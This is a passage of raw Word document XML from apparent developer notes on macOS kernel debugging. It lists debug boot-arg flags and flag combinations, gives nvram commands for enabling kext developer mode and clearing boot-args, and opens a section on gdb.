              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="9BB3CD"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="9BB3CD"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="93A5BB"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="160" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="160" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00B72483" w:rsidRDefault="00B72483">
            <w:pPr>
              <w:spacing w:after="960"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Lucida Sans Unicode" w:eastAsia="宋体" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Symbolic Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="9BB3CD"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="9BB3CD"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="93A5BB"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="160" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="160" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00B72483" w:rsidRDefault="00B72483">
            <w:pPr>
              <w:spacing w:after="960"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Lucida Sans Unicode" w:eastAsia="宋体" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Flag</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="9BB3CD"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="9BB3CD"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="93A5BB"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="160" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="160" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00B72483" w:rsidRDefault="00B72483">
            <w:pPr>
              <w:spacing w:after="960"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Lucida Sans Unicode" w:eastAsia="宋体" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Description</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NMI</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000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Activates the kernel debugging facility, including support for NMI (the programmer's switch on the front of the computer; see</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:hyperlink r:id="rId53" w:history="1">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
                  <w:color w:val="3366CC"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                </w:rPr>
                <w:t>Technical Q&amp;A QA1264: Generating a Non-Maskable Interrupt (NMI)</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>if your machine does not have a programmer's switch).</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ARP</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004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Allows the kernel debugger nub to use ARP and thus support debugging across subnets. You would typically enable this flag when collecting kernel core dumps.</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LOG_PI_SCRN</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01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Disable the graphical panic screen. You typically want to do this when you enable kernel core dumps so that you can see progress for the kernel core dump transmission.</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KERN_DUMP_ON_PANIC</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04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 xml:space="preserve">Causes the kernel to core dump when </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>the system panics.</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lastRenderedPageBreak/>
              <w:t>DB_KERN_DUMP_ON_NMI</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08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Causes the kernel to core dump when the user triggers an NMI.</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DBG_POST_CORE</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10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Controls the kernel's behavior after dumping core in response to an NMI (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
                <w:color w:val="666666"/>
              </w:rPr>
              <w:t>DB_KERN_DUMP_ON_NMI</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>). If the user triggers an NMI and this flag is clear, the kernel will dump core and then continue. Conversely, if this flag is set the kernel will dump core and then wait for a debugger connection.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B72483" w:rsidTr="00B72483">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Style w:val="HTMLCode"/>
                <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
                <w:color w:val="666666"/>
              </w:rPr>
              <w:t>DB_PANICLOG_DUMP</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0x2000</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B72483" w:rsidRDefault="00B72483">
            <w:pPr>
              <w:spacing w:after="960"/>
              <w:rPr>
                <w:rFonts w:ascii="Lucida Sans Unicode" w:eastAsia="宋体" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Controls whether the kernel dumps a full core (if the flag is clear) or simply a panic log (if the flag is set).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="008F32A4" w:rsidRPr="008F32A4" w:rsidRDefault="008F32A4" w:rsidP="008F32A4">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="324" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:eastAsia="宋体" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F32A4">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:eastAsia="宋体" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Table 2 : </w:t>
      </w:r>
      <w:r w:rsidRPr="008F32A4">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:eastAsia="宋体" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Useful debug flag combinations</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblCellSpacing w:w="0" w:type="dxa"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="6" w:space="0" w:color="9BB3CD"/>
          <w:left w:val="single" w:sz="6" w:space="0" w:color="9BB3CD"/>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7551"/>
      </w:tblGrid>
      <w:tr w:rsidR="008F32A4" w:rsidRPr="008F32A4" w:rsidTr="008F32A4">
        <w:trPr>
          <w:tblCellSpacing w:w="0" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="9BB3CD"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="9BB3CD"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="93A5BB"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="160" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="160" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="008F32A4" w:rsidRPr="008F32A4" w:rsidRDefault="008F32A4" w:rsidP="008F32A4">
            <w:pPr>
              <w:spacing w:after="960" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Lucida Sans Unicode" w:eastAsia="宋体" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008F32A4">
              <w:rPr>
                <w:rFonts w:ascii="Lucida Sans Unicode" w:eastAsia="宋体" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="9BB3CD"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="9BB3CD"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="93A5BB"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="160" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="160" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="008F32A4" w:rsidRPr="008F32A4" w:rsidRDefault="008F32A4" w:rsidP="008F32A4">
            <w:pPr>
              <w:spacing w:after="960" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Lucida Sans Unicode" w:eastAsia="宋体" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008F32A4">
              <w:rPr>
                <w:rFonts w:ascii="Lucida Sans Unicode" w:eastAsia="宋体" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Scenario</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008F32A4" w:rsidRPr="008F32A4" w:rsidTr="008F32A4">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lastRenderedPageBreak/>
              <w:t>0x004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Used for day-to-day two-machine debugging. </w:t>
            </w:r>
            <w:r w:rsidRPr="008F32A4">
              <w:rPr>
                <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
                <w:color w:val="666666"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>DB_NMI</w:t>
            </w:r>
            <w:r w:rsidRPr="008F32A4">
              <w:rPr>
                <w:rFonts w:ascii="Lucida Sans Unicode" w:eastAsia="宋体" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t> allows you to enter the kernel debugger by triggering NMI. </w:t>
            </w:r>
            <w:r w:rsidRPr="008F32A4">
              <w:rPr>
                <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
                <w:color w:val="666666"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>DB_ARP</w:t>
            </w:r>
            <w:r w:rsidRPr="008F32A4">
              <w:rPr>
                <w:rFonts w:ascii="Lucida Sans Unicode" w:eastAsia="宋体" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t> lets you debug without futzing around with permanent ARP table entries.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008F32A4" w:rsidRPr="008F32A4" w:rsidTr="008F32A4">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0x044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Used for capturing kernel core dumps. </w:t>
            </w:r>
            <w:r w:rsidRPr="008F32A4">
              <w:rPr>
                <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
                <w:color w:val="666666"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>DB_NMI</w:t>
            </w:r>
            <w:r w:rsidRPr="008F32A4">
              <w:rPr>
                <w:rFonts w:ascii="Lucida Sans Unicode" w:eastAsia="宋体" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t> is on in order to activate kernel debugging. </w:t>
            </w:r>
            <w:r w:rsidRPr="008F32A4">
              <w:rPr>
                <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
                <w:color w:val="666666"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>DB_ARP</w:t>
            </w:r>
            <w:r w:rsidRPr="008F32A4">
              <w:rPr>
                <w:rFonts w:ascii="Lucida Sans Unicode" w:eastAsia="宋体" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t> is on, as explained above.</w:t>
            </w:r>
            <w:r w:rsidRPr="008F32A4">
              <w:rPr>
                <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
                <w:color w:val="666666"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>DB_KERN_DUMP_ON_PANIC</w:t>
            </w:r>
            <w:r w:rsidRPr="008F32A4">
              <w:rPr>
                <w:rFonts w:ascii="Lucida Sans Unicode" w:eastAsia="宋体" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t> activates the kernel core dump facility.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008F32A4" w:rsidRPr="008F32A4" w:rsidTr="008F32A4">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0x244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Used for capturing kernel panic logs. The flags are set per the previous row except that </w:t>
            </w:r>
            <w:r w:rsidRPr="008F32A4">
              <w:rPr>
                <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
                <w:color w:val="666666"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>DB_PANICLOG_DUMP</w:t>
            </w:r>
            <w:r w:rsidRPr="008F32A4">
              <w:rPr>
                <w:rFonts w:ascii="Lucida Sans Unicode" w:eastAsia="宋体" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t> is set, causing the kernel to generate panic logs rather than core dumps.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008F32A4" w:rsidRPr="008F32A4" w:rsidTr="008F32A4">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0x084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Useful when the user reports mysterious kernel-level freezes. When a freeze occurs, the user can trigger NMI and the system generates a kernel core dump and then continues. There's no need to set </w:t>
            </w:r>
            <w:r w:rsidRPr="008F32A4">
              <w:rPr>
                <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
                <w:color w:val="666666"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>DB_LOG_PI_SCRN</w:t>
            </w:r>
            <w:r w:rsidRPr="008F32A4">
              <w:rPr>
                <w:rFonts w:ascii="Lucida Sans Unicode" w:eastAsia="宋体" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t> because it has no effect in this case.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008F32A4" w:rsidRPr="008F32A4" w:rsidTr="008F32A4">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0x0d4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8F32A4" w:rsidRPr="008F32A4" w:rsidRDefault="008F32A4" w:rsidP="008F32A4">
            <w:pPr>
              <w:spacing w:after="960" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Lucida Sans Unicode" w:eastAsia="宋体" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008F32A4">
              <w:rPr>
                <w:rFonts w:ascii="Lucida Sans Unicode" w:eastAsia="宋体" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Useful for testing the kernel core dump facility. This generates a kernel core dump if either a panic occurs or the user triggers NMI.</w:t>
            </w:r>
            <w:r w:rsidRPr="008F32A4">
              <w:rPr>
                <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
                <w:color w:val="666666"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>DB_LOG_PI_SCRN</w:t>
            </w:r>
            <w:r w:rsidRPr="008F32A4">
              <w:rPr>
                <w:rFonts w:ascii="Lucida Sans Unicode" w:eastAsia="宋体" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t> is set so that you can see progress for the kernel core dump transmission.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00B72483" w:rsidRPr="008F32A4" w:rsidRDefault="00B72483" w:rsidP="00892A93"/>
    <w:p w:rsidR="00A45196" w:rsidRDefault="00A45196" w:rsidP="00A45196">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A45196">
        <w:t> kext-dev-mode</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C133AD" w:rsidRDefault="004106D2" w:rsidP="00C133AD">
      <w:hyperlink r:id="rId54" w:history="1">
        <w:r w:rsidR="00C133AD" w:rsidRPr="001D68D1">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://www.cocoachina.com/bbs/read.php?tid=234363</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00C133AD" w:rsidRPr="00C133AD" w:rsidRDefault="00C133AD" w:rsidP="00C133AD"/>
    <w:p w:rsidR="00A45196" w:rsidRDefault="00A45196" w:rsidP="00A45196">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 xml:space="preserve">In order to load unsigned kexts, the system must have "KEXT Developer Mode" enabled by adding the "kext-devmode= 1" boot-arg. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A45196" w:rsidRDefault="00A45196" w:rsidP="00A45196">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sudo nvram boot-args="debug=0x146</w:t>
      </w:r>
      <w:r w:rsidRPr="00C133AD">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00477827" w:rsidRPr="00C133AD">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">kext-dev-mode </w:t>
      </w:r>
      <w:r w:rsidRPr="00C133AD">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>=1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>" </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00503799" w:rsidRDefault="00FC3D4B" w:rsidP="00A45196">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>You can exit developer mode by redefining the boot-arg to your previous settings, or clear your boot-args as follows: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC3D4B" w:rsidRDefault="00FC3D4B" w:rsidP="00A45196">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sudo nvram -d boot-args </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B104E2" w:rsidRDefault="00B104E2" w:rsidP="00B104E2">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B104E2">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>kcsuffix</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B104E2" w:rsidRDefault="004106D2" w:rsidP="00B104E2">
      <w:hyperlink r:id="rId55" w:history="1">
        <w:r w:rsidR="00B104E2" w:rsidRPr="001D68D1">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://pikeralpha.wordpress.com/2014/06/04/os-x-10-10-yosemite-dp1-kernelcache/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00B104E2" w:rsidRDefault="006956E7" w:rsidP="00B104E2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="444444"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="444444"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="444444"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>dd a suffix to the kernelcache</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A02543" w:rsidRPr="00B104E2" w:rsidRDefault="00A02543" w:rsidP="00A02543"/>
    <w:p w:rsidR="00A02543" w:rsidRPr="006B4005" w:rsidRDefault="00A02543" w:rsidP="00A02543">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="110" w:name="_Toc445313312"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Debugger</w:t>
      </w:r>
      <w:bookmarkEnd w:id="110"/>
    </w:p>
    <w:p w:rsidR="00A02543" w:rsidRDefault="00093FEF" w:rsidP="00A02543">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>g</w:t>
      </w:r>
      <w:r w:rsidR="00A02543">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">db </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A02543" w:rsidRPr="00A02543" w:rsidRDefault="00A02543" w:rsidP="00A02543">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLineChars="100" w:firstLine="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:eastAsia="宋体" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:eastAsia="宋体" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidRPr="00A02543">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:eastAsia="宋体" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
